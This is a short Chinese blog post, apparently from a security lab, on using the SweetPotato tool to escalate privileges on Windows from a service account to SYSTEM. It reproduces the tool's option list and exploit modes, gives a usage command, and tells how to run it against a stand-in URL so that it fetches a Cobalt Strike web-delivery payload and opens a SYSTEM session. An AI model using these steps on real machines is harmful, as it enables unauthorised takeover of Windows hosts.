windows提权的几种姿势(win2016提权)

基本介绍

从Windows 7到Windows 10 / Server 2019的本地服务到系统权限提升漏洞,也是土豆家族的有一个提权漏洞

项目地址

https://github.com/CCob/SweetPotato

SweetPotato by @_EthicalChaos_  Orignal RottenPotato code and exploit by @foxglovesec  Weaponized JuciyPotato by @decoder_it and @Guitro along with BITS WinRM discovery  PrintSpoofer discovery and original exploit by @itm4n  EfsRpc built on EfsPotato by @zcgonvh and PetitPotam by @topotam  -c, --clsid=VALUE          CLSID (default BITS:                               4991D34B-80A1-4291-83B6-3328366B9097)  -m, --method=VALUE         Auto,User,Thread (default Auto)  -p, --prog=VALUE           Program to launch (default cmd.exe)  -a, --args=VALUE           Arguments for program (default null)  -e, --exploit=VALUE        Exploit mode                               [DCOM|WinRM|EfsRpc|PrintSpoofer(default)]  -l, --listenPort=VALUE     COM server listen port (default 6666)  -h, --help                 Display this help

使用方法

SweetPotato.exe -a \\\"whoami\\\"

windows提权的几种姿势(win2016提权)

再使用过程中可以自定义 clsid 与端口,–help或者 – h查看帮助

同时可以对SweetPotato进行修改,使其可以直接上线一个system的session,效果图如下所示:

    Step 1: 使用cs启动一个web攻击的简体Step 2: 执行以下命令SweetPotato.exe www.xxx.com/xxx.xxx

    文末小结

    后续将会继续给出一些土豆家族的提权漏洞的使用方法,敬请期待~

    原创文章,作者:七芒星实验室,如若转载,请注明出处:https://www.sudun.com/ask/34376.html

    (0)
    七芒星实验室's avatar七芒星实验室
    上一篇 2024年4月16日 下午9:47
    下一篇 2024年4月16日 下午9:49

    相关推荐

    发表回复

    您的邮箱地址不会被公开。 必填项已用 * 标注